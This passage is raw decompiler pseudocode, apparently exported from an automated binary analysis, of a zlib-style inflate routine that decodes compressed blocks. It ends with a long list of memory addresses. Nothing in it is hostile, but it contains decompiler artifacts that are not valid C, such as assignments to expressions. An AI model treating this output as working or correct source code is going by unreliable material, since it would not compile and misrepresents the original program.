                                        										__eflags =  *(__esi + 8) - 0x13;
                                        									}
                                        									__ecx =  *(__esi + 0x24);
                                        									__edx = __esi + 0x14;
                                        									__eax = __esi + 0x10;
                                        									 *(__esi + 0x10) = 7;
                                        									__eax =  *(__esi + 0xc);
                                        									__eax = E29D8B720(__ebx,  *(__esi + 0xc),  *(__esi + 0xc), __esi + 0x14,  *(__esi + 0x24));
                                        									_v24 = __eax;
                                        									__eflags = __eax;
                                        									if(__eax != 0) {
                                        										__eflags = _v24 - 0xfffffffd;
                                        										if(_v24 == 0xfffffffd) {
                                        											__edx =  *(__esi + 0xc);
                                        											__eax =  *(__ebx + 0x28);
                                        											__ecx =  *(__ebx + 0x24);
                                        											_push( *(__esi + 0xc));
                                        											_push( *(__ebx + 0x28));
                                        											__eax =  *( *(__ebx + 0x24))();
                                        											__esp = __esp + 8;
                                        											 *__esi = 9;
                                        										}
                                        										__edx = _v8;
                                        										__eax = _v16;
                                        										 *(__esi + 0x20) = _v8;
                                        										 *(__esi + 0x1c) = __edi;
                                        										 *(__ebx + 4) = _v16;
                                        										__eax = _v12;
                                        										 *__ebx = __eax;
                                        										__eax = _v24;
                                        										_push(_v24);
                                        										goto L99;
                                        									} else {
                                        										 *(__esi + 8) = __eax;
                                        										__eax = _v8;
                                        										 *__esi = 5;
                                        										goto L61;
                                        									}
                                        								} else {
                                        									do {
                                        										__eflags = __edi - 3;
                                        										if(__edi >= 3) {
                                        											goto L55;
                                        										} else {
                                        											while(1) {
                                        												__eflags = _v16;
                                        												if(_v16 == 0) {
                                        													goto L107;
                                        												}
                                        												_v16 = _v16 - __edx;
                                        												_v12 =  *_v12 & 0x000000ff;
                                        												__ecx = __edi;
                                        												__edx = ( *_v12 & 0x000000ff) << __cl;
                                        												__edi = __edi + 8;
                                        												_a4 = 0;
                                        												__eax = __eax | ( *_v12 & 0x000000ff) << __cl;
                                        												__edx = 1;
                                        												_v12 = _v12 + 1;
                                        												_v8 = __eax;
                                        												__eflags = __edi - 3;
                                        												if(__edi < 3) {
                                        													continue;
                                        												} else {
                                        													goto L55;
                                        												}
                                        												goto L124;
                                        											}
                                        											goto L107;
                                        										}
                                        										goto L124;
                                        										L55:
                                        										__ecx =  *(__esi + 8);
                                        										__edx =  *(0x29dcf0a0 +  *(__esi + 8) * 4);
                                        										__ecx =  *(__esi + 0xc);
                                        										 *( *(__esi + 0xc) +  *(0x29dcf0a0 +  *(__esi + 8) * 4) * 4) = __eax;
                                        										__eax = _v8;
                                        										__edx = 1;
                                        										 *(__esi + 8) =  *(__esi + 8) + 1;
                                        										 *(__esi + 4) =  *(__esi + 4) >> 0xa;
                                        										__eax = _v8 >> 3;
                                        										__ecx = ( *(__esi + 4) >> 0xa) + 4;
                                        										__edi = __edi - 3;
                                        										_v8 = __eax;
                                        										__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
                                        									} while ( *(__esi + 8) < ( *(__esi + 4) >> 0xa) + 4);
                                        									goto L56;
                                        								}
                                        								goto L124;
                                        							case 5:
                                        								L61:
                                        								__ecx =  *(__esi + 4);
                                        								__ecx = __ecx >> 5;
                                        								__edx = __ecx >> 0x00000005 & 0x0000001f;
                                        								_t148 = __ecx + 0x102; // 0x110
                                        								__ecx = __edx + _t148;
                                        								__eflags =  *(__esi + 8) - __edx + _t148;
                                        								if( *(__esi + 8) >= __edx + _t148) {
                                        									L84:
                                        									__ecx =  *(__esi + 0x24);
                                        									__eax =  *(__esi + 4);
                                        									__edx =  &_v48;
                                        									__ecx =  &_v44;
                                        									 &_v28 =  *(__esi + 0xc);
                                        									 &_v32 = __eax;
                                        									__eax >> 5 = __eax >> 0x00000005 & 0x0000001f;
                                        									__ecx = (__eax >> 0x00000005 & 0x0000001f) + 1;
                                        									__eax = __eax + 0x101;
                                        									 *(__esi + 0x14) = 0;
                                        									_v32 = 9;
                                        									_v28 = 6;
                                        									__eax = E29D8B7B0(__ebx, __eax, __ecx,  *(__esi + 0xc),  &_v32,  &_v28,  &_v44,  &_v48,  *(__esi + 0x24));
                                        									_v24 = __eax;
                                        									__eflags = __eax;
                                        									if(__eax != 0) {
                                        										__eflags = _v24 - 0xfffffffd;
                                        										if(_v24 == 0xfffffffd) {
                                        											__eax =  *(__esi + 0xc);
                                        											__ecx =  *(__ebx + 0x28);
                                        											__edx =  *(__ebx + 0x24);
                                        											_push( *(__esi + 0xc));
                                        											_push( *(__ebx + 0x28));
                                        											__eax =  *( *(__ebx + 0x24))();
                                        											__esp = __esp + 8;
                                        											 *__esi = 9;
                                        										}
                                        										__eax = _v8;
                                        										__ecx = _v16;
                                        										 *(__esi + 0x20) = _v8;
                                        										__eax = _v12;
                                        										 *(__esi + 0x1c) = __edi;
                                        										__eax = __eax -  *__ebx;
                                        										 *(__ebx + 4) = _v16;
                                        										__ecx = _v24;
                                        										_t372 = __ebx + 8;
                                        										 *_t372 =  *(__ebx + 8) + __eax -  *__ebx;
                                        										__eflags =  *_t372;
                                        										 *__ebx = __eax;
                                        										__eax = _v20;
                                        										 *(__esi + 0x34) = _v20;
                                        										__eax = E29D89EF0(__ebx, __esi, _v24);
                                        										_pop(__edi);
                                        										_pop(__esi);
                                        										return __eax;
                                        									} else {
                                        										__edx =  *(__ebx + 0x28);
                                        										__eax =  *(__ebx + 0x20);
                                        										_push(0x1c);
                                        										_push(1);
                                        										_push( *(__ebx + 0x28));
                                        										__eax =  *( *(__ebx + 0x20))();
                                        										__esp = __esp + 0xc;
                                        										__eflags = __eax;
                                        										if(__eax == 0) {
                                        											L108:
                                        											__edx = _v8;
                                        											__eax = _v16;
                                        											 *(__esi + 0x20) = _v8;
                                        											 *(__esi + 0x1c) = __edi;
                                        											 *(__ebx + 4) = _v16;
                                        											_push(0xfffffffc);
                                        											goto L98;
                                        										} else {
                                        											__cl = _v32;
                                        											 *(__eax + 0x10) = __cl;
                                        											__ecx = _v44;
                                        											 *((char*)(__eax + 0x11)) = _v28;
                                        											__edx = _v48;
                                        											 *__eax = 0;
                                        											 *(__eax + 0x14) = _v44;
                                        											 *(__eax + 0x18) = _v48;
                                        											 *(__esi + 4) = __eax;
                                        											__eax =  *(__esi + 0xc);
                                        											__ecx =  *(__ebx + 0x28);
                                        											__edx =  *(__ebx + 0x24);
                                        											_push( *(__esi + 0xc));
                                        											_push( *(__ebx + 0x28));
                                        											__eax =  *( *(__ebx + 0x24))();
                                        											__esp = __esp + 8;
                                        											 *__esi = 6;
                                        											goto L87;
                                        										}
                                        									}
                                        								} else {
                                        									__edx = 1;
                                        									while(1) {
                                        										__ecx =  *(__esi + 0x10);
                                        										__eflags = __edi - __ecx;
                                        										if(__edi >= __ecx) {
                                        											goto L67;
                                        										} else {
                                        											goto L65;
                                        										}
                                        										while(1) {
                                        											L65:
                                        											__eflags = _v16;
                                        											if(_v16 == 0) {
                                        												break;
                                        											}
                                        											_v16 = _v16 - __edx;
                                        											_v12 =  *_v12 & 0x000000ff;
                                        											__ecx = __edi;
                                        											__edx = ( *_v12 & 0x000000ff) << __cl;
                                        											__ecx =  *(__esi + 0x10);
                                        											__edi = __edi + 8;
                                        											_a4 = 0;
                                        											__eax = __eax | ( *_v12 & 0x000000ff) << __cl;
                                        											__edx = 1;
                                        											_v12 = _v12 + 1;
                                        											_v8 = __eax;
                                        											__eflags = __edi - __ecx;
                                        											if(__edi < __ecx) {
                                        												continue;
                                        											} else {
                                        												goto L67;
                                        											}
                                        											goto L124;
                                        										}
                                        										L107:
                                        										__eax = _v12;
                                        										__ecx = _v8;
                                        										 *(__esi + 0x20) = _v8;
                                        										__ecx = _a4;
                                        										 *(__esi + 0x1c) = __edi;
                                        										__edx = __eax;
                                        										__edx = __eax -  *__ebx;
                                        										 *__ebx = __eax;
                                        										__eax = _v20;
                                        										_t316 = __ebx + 8;
                                        										 *_t316 =  *(__ebx + 8) + __edx;
                                        										__eflags =  *_t316;
                                        										 *(__ebx + 4) = 0;
                                        										 *(__esi + 0x34) = _v20;
                                        										__eax = E29D89EF0(__ebx, __esi, _a4);
                                        										_pop(__edi);
                                        										_pop(__esi);
                                        										return __eax;
                                        										goto L124;
                                        										L67:
                                        										__ecx =  *(0x29dcdf58 + __ecx * 4);
                                        										__edx =  *(__esi + 0x14);
                                        										__edx =  *(__esi + 0x14) + __ecx * 8;
                                        										__ecx =  *(__edx + 1) & 0x000000ff;
                                        										__edx =  *(__edx + 4);
                                        										_v24 = __ecx;
                                        										_v40 = __edx;
                                        										__eflags = __edx - 0x10;
                                        										if(__edx >= 0x10) {
                                        											__eflags = __edx - 0x12;
                                        											if(__edx != 0x12) {
                                        												_t178 = __edx - 0xe; // 0x0
                                        												__ecx = _t178;
                                        												_v32 = _t178;
                                        											} else {
                                        												_v32 = 7;
                                        											}
                                        											__ecx = 0;
                                        											__eflags = __edx - 0x12;
                                        											0 | __edx == 0x00000012 = 3 + (__edx == 0x12) * 8;
                                        											_v28 = 3 + (__edx == 0x12) * 8;
                                        											__ecx = _v24;
                                        											__ecx = _v24 + _v32;
                                        											_v36 = __ecx;
                                        											__eflags = __edi - __ecx;
                                        											if(__edi >= __ecx) {
                                        												L76:
                                        												__ecx = _v24;
                                        												__eax = __eax >> __cl;
                                        												__ecx = _v32;
                                        												 *(0x29dcdf58 + __ecx * 4) =  *(0x29dcdf58 + __ecx * 4) & __eax;
                                        												_v28 = _v28 + ( *(0x29dcdf58 + __ecx * 4) & __eax);
                                        												__eax = __eax >> __cl;
                                        												__edi = __edi - __ecx;
                                        												__ecx =  *(__esi + 8);
                                        												_v8 = __eax;
                                        												__eax =  *(__esi + 4);
                                        												__eax = __eax >> 5;
                                        												__edx = __eax >> 0x00000005 & 0x0000001f;
                                        												_t208 = __eax + 0x102; // 0x110
                                        												__eax = __edx + _t208;
                                        												_v28 = _v28 + __ecx;
                                        												__eflags = _v28 + __ecx - __eax;
                                        												if(_v28 + __ecx > __eax) {
                                        													L114:
                                        													__ecx =  *(__esi + 0xc);
                                        													__edx =  *(__ebx + 0x28);
                                        													__eax =  *(__ebx + 0x24);
                                        													_push( *(__esi + 0xc));
                                        													_push( *(__ebx + 0x28));
                                        													__eax =  *( *(__ebx + 0x24))();
                                        													__ecx = _v8;
                                        													__eax = _v12;
                                        													__edx = _v16;
                                        													 *__esi = 9;
                                        													 *(__ebx + 0x18) = "invalid bit length repeat";
                                        													 *(__esi + 0x20) = _v8;
                                        													 *(__esi + 0x1c) = __edi;
                                        													__eax = __eax -  *__ebx;
                                        													 *(__ebx + 4) = _v16;
                                        													__edx = _v20;
                                        													_t358 = __ebx + 8;
                                        													 *_t358 =  *(__ebx + 8) + __eax -  *__ebx;
                                        													__eflags =  *_t358;
                                        													 *__ebx = __eax;
                                        													 *(__esi + 0x34) = _v20;
                                        													__eax = E29D89EF0(__ebx, __esi, 0xfffffffd);
                                        													_pop(__edi);
                                        													_pop(__esi);
                                        													return __eax;
                                        												} else {
                                        													__eflags = _v40 - 0x10;
                                        													if(_v40 != 0x10) {
                                        														__eax = 0;
                                        														__eflags = 0;
                                        														goto L81;
                                        													} else {
                                        														__eflags = __ecx - 1;
                                        														if(__ecx < 1) {
                                        															goto L114;
                                        														} else {
                                        															__eax =  *(__esi + 0xc);
                                        															__eax =  *( *(__esi + 0xc) + __ecx * 4 - 4);
                                        															do {
                                        																L81:
                                        																__edx =  *(__esi + 0xc);
                                        																 *( *(__esi + 0xc) + __ecx * 4) = __eax;
                                        																__ecx = __ecx + 1;
                                        																_t218 =  &_v28;
                                        																 *_t218 = _v28 - 1;
                                        																__eflags =  *_t218;
                                        															} while ( *_t218 != 0);
                                        															 *(__esi + 8) = __ecx;
                                        															__edx = 1;
                                        															goto L83;
                                        														}
                                        													}
                                        												}
                                        											} else {
                                        												__ecx = 1;
                                        												while(1) {
                                        													__eflags = _v16;
                                        													if(_v16 == 0) {
                                        														break;
                                        													}
                                        													__edx = _v12;
                                        													_v16 = _v16 - __ecx;
                                        													__edx =  *_v12 & 0x000000ff;
                                        													__ecx = __edi;
                                        													__edx = ( *_v12 & 0x000000ff) << __cl;
                                        													__ecx = 1;
                                        													_v12 = _v12 + 1;
                                        													__edi = __edi + 8;
                                        													__eax = __eax | ( *_v12 & 0x000000ff) << __cl;
                                        													_a4 = 0;
                                        													_v8 = __eax;
                                        													__eflags = __edi - _v36;
                                        													if(__edi < _v36) {
                                        														continue;
                                        													} else {
                                        														goto L76;
                                        													}
                                        													goto L124;
                                        												}
                                        												L100:
                                        												_t438[8] = _v8;
                                        												L101:
                                        												_t402 = _v12;
                                        												_t438[7] = _t434;
                                        												_t414 = _t402 -  *_t405;
                                        												 *_t405 = _t402;
                                        												_t405[1] = 0;
                                        												_push(_a4);
                                        												goto L99;
                                        											}
                                        										} else {
                                        											__eax = __eax >> __cl;
                                        											__edi = __edi - __ecx;
                                        											__ecx =  *(__esi + 0xc);
                                        											_v8 = __eax;
                                        											__eax =  *(__esi + 8);
                                        											 *( *(__esi + 0xc) +  *(__esi + 8) * 4) = __edx;
                                        											__edx = 1;
                                        											 *(__esi + 8) =  *(__esi + 8) + 1;
                                        											L83:
                                        											__eax =  *(__esi + 4);
                                        											__eax = __eax >> 5;
                                        											__ecx = __eax >> 0x00000005 & 0x0000001f;
                                        											_t223 = __eax + 0x102; // 0x110
                                        											__eax = __ecx + _t223;
                                        											__eflags =  *(__esi + 8) - __ecx + _t223;
                                        											if( *(__esi + 8) < __ecx + _t223) {
                                        												__eax = _v8;
                                        												__ecx =  *(__esi + 0x10);
                                        												__eflags = __edi - __ecx;
                                        												if(__edi >= __ecx) {
                                        													goto L67;
                                        												} else {
                                        													goto L65;
                                        												}
                                        											} else {
                                        												goto L84;
                                        											}
                                        										}
                                        										goto L124;
                                        									}
                                        								}
                                        								goto L124;
                                        							case 6:
                                        								L87:
                                        								__eax = _v8;
                                        								__ecx = _v16;
                                        								 *(__esi + 0x20) = _v8;
                                        								__eax = _v12;
                                        								 *(__esi + 0x1c) = __edi;
                                        								__eax = __eax -  *__ebx;
                                        								 *(__ebx + 4) = _v16;
                                        								__ecx = _a4;
                                        								 *(__ebx + 8) =  *(__ebx + 8) + __eax -  *__ebx;
                                        								 *__ebx = __eax;
                                        								__eax = _v20;
                                        								 *(__esi + 0x34) = _v20;
                                        								__eax = __ebx;
                                        								__ecx = __esi;
                                        								__eax = E29D8A030(__ebx, __esi, _a4);
                                        								__eflags = __eax - 1;
                                        								if(__eax != 1) {
                                        									goto L121;
                                        								} else {
                                        									__edx =  *(__esi + 4);
                                        									__eax =  *(__ebx + 0x28);
                                        									__ecx =  *(__ebx + 0x24);
                                        									_push( *(__esi + 4));
                                        									_push( *(__ebx + 0x28));
                                        									_a4 = 0;
                                        									 *( *(__ebx + 0x24))() =  *(__ebx + 4);
                                        									__ecx =  *(__esi + 0x20);
                                        									__edx =  *__ebx;
                                        									__edi =  *(__esi + 0x1c);
                                        									_v16 =  *(__ebx + 4);
                                        									__eax =  *(__esi + 0x30);
                                        									_v8 =  *(__esi + 0x20);
                                        									__ecx =  *(__esi + 0x34);
                                        									__esp = __esp + 8;
                                        									_v12 = __edx;
                                        									_v20 = __ecx;
                                        									__eflags = __ecx - __eax;
                                        									if(__ecx >= __eax) {
                                        										__eax =  *(__esi + 0x2c);
                                        										__eax =  *(__esi + 0x2c) - __ecx;
                                        										__eflags = __eax;
                                        									} else {
                                        										__eax = __eax - __ecx;
                                        										__eax = __eax - 1;
                                        									}
                                        									__eflags =  *(__esi + 0x18);
                                        									_v28 = __eax;
                                        									if( *(__esi + 0x18) != 0) {
                                        										 *__esi = 7;
                                        										goto L119;
                                        									} else {
                                        										 *__esi = 0;
                                        										goto L93;
                                        									}
                                        								}
                                        								goto L124;
                                        							case 7:
                                        								L119:
                                        								__ecx = _a4;
                                        								__eax = _v20;
                                        								 *(__esi + 0x34) = _v20;
                                        								__eax = E29D89EF0(__ebx, __esi, _a4);
                                        								__ecx =  *(__esi + 0x34);
                                        								_v20 = __ecx;
                                        								__eflags =  *(__esi + 0x30) - __ecx;
                                        								if( *(__esi + 0x30) == __ecx) {
                                        									 *__esi = 8;
                                        									goto L123;
                                        								} else {
                                        									__edx = _v8;
                                        									__ecx = _v16;
                                        									 *(__esi + 0x20) = _v8;
                                        									 *(__esi + 0x1c) = __edi;
                                        									 *(__ebx + 4) = _v16;
                                        									__ecx = _v12;
                                        									__edx = __ecx;
                                        									__edx = __ecx -  *__ebx;
                                        									 *__ebx = __ecx;
                                        									__ecx = _v20;
                                        									_t389 = __ebx + 8;
                                        									 *_t389 =  *(__ebx + 8) + __edx;
                                        									__eflags =  *_t389;
                                        									 *(__esi + 0x34) = _v20;
                                        									L121:
                                        									__eax = E29D89EF0(__ebx, __esi, __eax);
                                        									_pop(__edi);
                                        									_pop(__esi);
                                        									return __eax;
                                        								}
                                        								goto L124;
                                        							case 8:
                                        								L123:
                                        								__edx = _v8;
                                        								__eax = _v16;
                                        								 *(__esi + 0x20) = _v8;
                                        								 *(__esi + 0x1c) = __edi;
                                        								 *(__ebx + 4) = _v16;
                                        								_push(1);
                                        								goto L98;
                                        							case 9:
                                        								L110:
                                        								__eax = _v8;
                                        								__ecx = _v16;
                                        								 *(__esi + 0x20) = _v8;
                                        								__eax = _v12;
                                        								 *(__esi + 0x1c) = __edi;
                                        								__edx = __eax;
                                        								__edx = __eax -  *__ebx;
                                        								 *__ebx = __eax;
                                        								__eax = _v20;
                                        								_t332 = __ebx + 8;
                                        								 *_t332 =  *(__ebx + 8) + __edx;
                                        								__eflags =  *_t332;
                                        								 *(__ebx + 4) = _v16;
                                        								 *(__esi + 0x34) = _v20;
                                        								__eax = E29D89EF0(__ebx, __esi, 0xfffffffd);
                                        								_pop(__edi);
                                        								_pop(__esi);
                                        								return __eax;
                                        								goto L124;
                                        							case 0xa:
                                        								L10:
                                        								_t436 = _t434 - 3;
                                        								_t419 = _t436 & 0x00000007;
                                        								_t399 = _t399 >> 3 >> _t419;
                                        								_t424 = 1;
                                        								_t434 = _t436 - _t419;
                                        								 *_t438 = 1;
                                        								_v8 = _t399;
                                        								goto L95;
                                        							case 0xb:
                                        								L11:
                                        								__eax = __ebx;
                                        								__eax = E29D89FF0(__ebx, 9, 5, 0x29dcdfa0, 0x29dcefa0);
                                        								 *(__esi + 4) = __eax;
                                        								__eflags = __eax;
                                        								if(__eax == 0) {
                                        									_push(0xfffffffc);
                                        									L97:
                                        									_t438[8] = _v8;
                                        									_t438[7] = _t434;
                                        									_t405[1] = _v16;
                                        									goto L98;
                                        								} else {
                                        									_v8 = _v8 >> 3;
                                        									__edi = __edi - 3;
                                        									 *__esi = 6;
                                        									L93:
                                        									__eax = _v8;
                                        									goto L94;
                                        								}
                                        								goto L124;
                                        							case 0xc:
                                        								L13:
                                        								__eax = __eax >> 3;
                                        								_v8 = __eax;
                                        								__edi = __edi - 3;
                                        								 *__esi = 3;
                                        								L94:
                                        								_t424 = 1;
                                        								goto L95;
                                        							case 0xd:
                                        								L103:
                                        								_v8 = _v8 >> 3;
                                        								 *__esi = 9;
                                        								 *(__ebx + 0x18) = "invalid block type";
                                        								 *(__esi + 0x20) = _v8 >> 3;
                                        								__eax = _v16;
                                        								 *(__esi + 0x1c) = __edi;
                                        								 *(__ebx + 4) = _v16;
                                        								_push(0xfffffffd);
                                        								L98:
                                        								_t400 = _v12;
                                        								_t414 = _t400 -  *_t405;
                                        								 *_t405 = _t400;
                                        								L99:
                                        								_t405[2] = _t405[2] + _t414;
                                        								_t438[0xd] = _v20;
                                        								return E29D89EF0(_t405, _t438);
                                        								goto L124;
                                        						}
                                        						L95:
                                        						_t411 =  *_t438;
                                        					} while (_t411 <= 9);
                                        					goto L96;
                                        				}
                                        				L124:
                                        			}























                                        0x29d8aa3d
                                        0x29d8aa40
                                        0x29d8aa43
                                        0x29d8aa45
                                        0x29d8aa47
                                        0x29d8aa4a
                                        0x29d8aa51
                                        0x29d8aa53
                                        0x29d8aa58
                                        0x29d8aa5b
                                        0x29d8aa5e
                                        0x29d8aa61
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8aa61
                                        0x00000000
                                        0x29d8aa30
                                        0x00000000
                                        0x00000000
                                        0x29d8aac5
                                        0x29d8aac8
                                        0x29d8aacb
                                        0x29d8aace
                                        0x29d8aad1
                                        0x29d8ab40
                                        0x29d8ab40
                                        0x29d8ab45
                                        0x29d8ab48
                                        0x29d8ab50
                                        0x29d8ab53
                                        0x29d8ab5a
                                        0x29d8ab5d
                                        0x29d8ab64
                                        0x29d8ab67
                                        0x29d8ab67
                                        0x29d8ab6c
                                        0x29d8ab70
                                        0x29d8ab73
                                        0x29d8ab78
                                        0x29d8ab7e
                                        0x29d8ab82
                                        0x29d8ab8a
                                        0x29d8ab8d
                                        0x29d8ab8f
                                        0x29d8afcb
                                        0x29d8afcf
                                        0x29d8afd1
                                        0x29d8afd4
                                        0x29d8afd7
                                        0x29d8afda
                                        0x29d8afdb
                                        0x29d8afdc
                                        0x29d8afde
                                        0x29d8afe1
                                        0x29d8afe1
                                        0x29d8afe7
                                        0x29d8afea
                                        0x29d8afed
                                        0x29d8aff0
                                        0x29d8aff3
                                        0x29d8aff6
                                        0x29d8affd
                                        0x29d8afff
                                        0x29d8b002
                                        0x00000000
                                        0x29d8ab95
                                        0x29d8ab95
                                        0x29d8ab98
                                        0x29d8ab9b
                                        0x00000000
                                        0x29d8ab9b
                                        0x29d8aad3
                                        0x29d8aad3
                                        0x29d8aad3
                                        0x29d8aad6
                                        0x00000000
                                        0x29d8aad8
                                        0x29d8aad8
                                        0x29d8aad8
                                        0x29d8aadc
                                        0x00000000
                                        0x00000000
                                        0x29d8aae2
                                        0x29d8aae8
                                        0x29d8aaeb
                                        0x29d8aaed
                                        0x29d8aaef
                                        0x29d8aaf2
                                        0x29d8aaf9
                                        0x29d8aafb
                                        0x29d8ab00
                                        0x29d8ab03
                                        0x29d8ab06
                                        0x29d8ab09
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8ab09
                                        0x00000000
                                        0x29d8aad8
                                        0x00000000
                                        0x29d8ab0b
                                        0x29d8ab0b
                                        0x29d8ab0e
                                        0x29d8ab15
                                        0x29d8ab1b
                                        0x29d8ab1e
                                        0x29d8ab21
                                        0x29d8ab26
                                        0x29d8ab2c
                                        0x29d8ab2f
                                        0x29d8ab32
                                        0x29d8ab35
                                        0x29d8ab38
                                        0x29d8ab3b
                                        0x29d8ab3b
                                        0x00000000
                                        0x29d8aad3
                                        0x00000000
                                        0x00000000
                                        0x29d8aba1
                                        0x29d8aba1
                                        0x29d8aba6
                                        0x29d8aba9
                                        0x29d8abaf
                                        0x29d8abaf
                                        0x29d8abb6
                                        0x29d8abb9
                                        0x29d8ad42
                                        0x29d8ad42
                                        0x29d8ad45
                                        0x29d8ad49
                                        0x29d8ad4d
                                        0x29d8ad55
                                        0x29d8ad5c
                                        0x29d8ad61
                                        0x29d8ad65
                                        0x29d8ad6a
                                        0x29d8ad70
                                        0x29d8ad77
                                        0x29d8ad7e
                                        0x29d8ad85
                                        0x29d8ad8d
                                        0x29d8ad90
                                        0x29d8ad92
                                        0x29d8b054
                                        0x29d8b058
                                        0x29d8b05a
                                        0x29d8b05d
                                        0x29d8b060
                                        0x29d8b063
                                        0x29d8b064
                                        0x29d8b065
                                        0x29d8b067
                                        0x29d8b06a
                                        0x29d8b06a
                                        0x29d8b070
                                        0x29d8b073
                                        0x29d8b076
                                        0x29d8b079
                                        0x29d8b07c
                                        0x29d8b081
                                        0x29d8b083
                                        0x29d8b086
                                        0x29d8b089
                                        0x29d8b089
                                        0x29d8b089
                                        0x29d8b08c
                                        0x29d8b08e
                                        0x29d8b092
                                        0x29d8b095
                                        0x29d8b09d
                                        0x29d8b09e
                                        0x29d8b0a3
                                        0x29d8ad98
                                        0x29d8ad98
                                        0x29d8ad9b
                                        0x29d8ad9e
                                        0x29d8ada0
                                        0x29d8ada2
                                        0x29d8ada3
                                        0x29d8ada5
                                        0x29d8ada8
                                        0x29d8adaa
                                        0x29d8af76
                                        0x29d8af76
                                        0x29d8af79
                                        0x29d8af7c
                                        0x29d8af7f
                                        0x29d8af82
                                        0x29d8af85
                                        0x00000000
                                        0x29d8adb0
                                        0x29d8adb0
                                        0x29d8adb6
                                        0x29d8adb9
                                        0x29d8adbc
                                        0x29d8adbf
                                        0x29d8adc2
                                        0x29d8adc8
                                        0x29d8adcb
                                        0x29d8adce
                                        0x29d8add1
                                        0x29d8add4
                                        0x29d8add7
                                        0x29d8adda
                                        0x29d8addb
                                        0x29d8addc
                                        0x29d8adde
                                        0x29d8ade1
                                        0x00000000
                                        0x29d8ade1
                                        0x29d8adaa
                                        0x29d8abbf
                                        0x29d8abbf
                                        0x29d8abc9
                                        0x29d8abc9
                                        0x29d8abcc
                                        0x29d8abce
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8abd0
                                        0x29d8abd0
                                        0x29d8abd0
                                        0x29d8abd4
                                        0x00000000
                                        0x00000000
                                        0x29d8abda
                                        0x29d8abe0
                                        0x29d8abe3
                                        0x29d8abe5
                                        0x29d8abe7
                                        0x29d8abea
                                        0x29d8abed
                                        0x29d8abf4
                                        0x29d8abf6
                                        0x29d8abfb
                                        0x29d8abfe
                                        0x29d8ac01
                                        0x29d8ac03
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8ac03
                                        0x29d8af41
                                        0x29d8af41
                                        0x29d8af44
                                        0x29d8af47
                                        0x29d8af4a
                                        0x29d8af4d
                                        0x29d8af50
                                        0x29d8af52
                                        0x29d8af54
                                        0x29d8af56
                                        0x29d8af59
                                        0x29d8af59
                                        0x29d8af59
                                        0x29d8af5c
                                        0x29d8af64
                                        0x29d8af67
                                        0x29d8af6f
                                        0x29d8af70
                                        0x29d8af75
                                        0x00000000
                                        0x29d8ac05
                                        0x29d8ac05
                                        0x29d8ac0c
                                        0x29d8ac11
                                        0x29d8ac14
                                        0x29d8ac18
                                        0x29d8ac1b
                                        0x29d8ac1e
                                        0x29d8ac21
                                        0x29d8ac24
                                        0x29d8ac43
                                        0x29d8ac46
                                        0x29d8ac51
                                        0x29d8ac51
                                        0x29d8ac54
                                        0x29d8ac48
                                        0x29d8ac48
                                        0x29d8ac48
                                        0x29d8ac57
                                        0x29d8ac59
                                        0x29d8ac5f
                                        0x29d8ac66
                                        0x29d8ac69
                                        0x29d8ac6c
                                        0x29d8ac6f
                                        0x29d8ac72
                                        0x29d8ac74
                                        0x29d8acb3
                                        0x29d8acb3
                                        0x29d8acb6
                                        0x29d8acb8
                                        0x29d8acc2
                                        0x29d8acc4
                                        0x29d8acc7
                                        0x29d8accc
                                        0x29d8acce
                                        0x29d8acd1
                                        0x29d8acd4
                                        0x29d8acd9
                                        0x29d8acdc
                                        0x29d8ace2
                                        0x29d8ace2
                                        0x29d8acec
                                        0x29d8acee
                                        0x29d8acf0
                                        0x29d8b008
                                        0x29d8b008
                                        0x29d8b00b
                                        0x29d8b00e
                                        0x29d8b011
                                        0x29d8b012
                                        0x29d8b013
                                        0x29d8b015
                                        0x29d8b018
                                        0x29d8b01b
                                        0x29d8b01e
                                        0x29d8b024
                                        0x29d8b02b
                                        0x29d8b02e
                                        0x29d8b033
                                        0x29d8b035
                                        0x29d8b038
                                        0x29d8b03b
                                        0x29d8b03b
                                        0x29d8b03b
                                        0x29d8b03e
                                        0x29d8b042
                                        0x29d8b045
                                        0x29d8b04d
                                        0x29d8b04e
                                        0x29d8b053
                                        0x29d8acf6
                                        0x29d8acf6
                                        0x29d8acfa
                                        0x29d8ad0e
                                        0x29d8ad0e
                                        0x00000000
                                        0x29d8acfc
                                        0x29d8acfc
                                        0x29d8acff
                                        0x00000000
                                        0x29d8ad05
                                        0x29d8ad05
                                        0x29d8ad08
                                        0x29d8ad10
                                        0x29d8ad10
                                        0x29d8ad10
                                        0x29d8ad13
                                        0x29d8ad16
                                        0x29d8ad17
                                        0x29d8ad17
                                        0x29d8ad17
                                        0x29d8ad17
                                        0x29d8ad1c
                                        0x29d8ad1f
                                        0x00000000
                                        0x29d8ad1f
                                        0x29d8acff
                                        0x29d8acfa
                                        0x29d8ac76
                                        0x29d8ac76
                                        0x29d8ac80
                                        0x29d8ac80
                                        0x29d8ac84
                                        0x00000000
                                        0x00000000
                                        0x29d8ac8a
                                        0x29d8ac8d
                                        0x29d8ac90
                                        0x29d8ac93
                                        0x29d8ac95
                                        0x29d8ac97
                                        0x29d8ac9c
                                        0x29d8ac9f
                                        0x29d8aca2
                                        0x29d8aca4
                                        0x29d8acab
                                        0x29d8acae
                                        0x29d8acb1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8acb1
                                        0x29d8aebb
                                        0x29d8aebe
                                        0x29d8aec1
                                        0x29d8aec1
                                        0x29d8aec4
                                        0x29d8aec9
                                        0x29d8aecb
                                        0x29d8aed0
                                        0x29d8aed7
                                        0x00000000
                                        0x29d8aed7
                                        0x29d8ac26
                                        0x29d8ac26
                                        0x29d8ac28
                                        0x29d8ac2a
                                        0x29d8ac2d
                                        0x29d8ac30
                                        0x29d8ac33
                                        0x29d8ac36
                                        0x29d8ac3b
                                        0x29d8ad24
                                        0x29d8ad24
                                        0x29d8ad29
                                        0x29d8ad2c
                                        0x29d8ad32
                                        0x29d8ad32
                                        0x29d8ad39
                                        0x29d8ad3c
                                        0x29d8abc6
                                        0x29d8abc9
                                        0x29d8abcc
                                        0x29d8abce
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
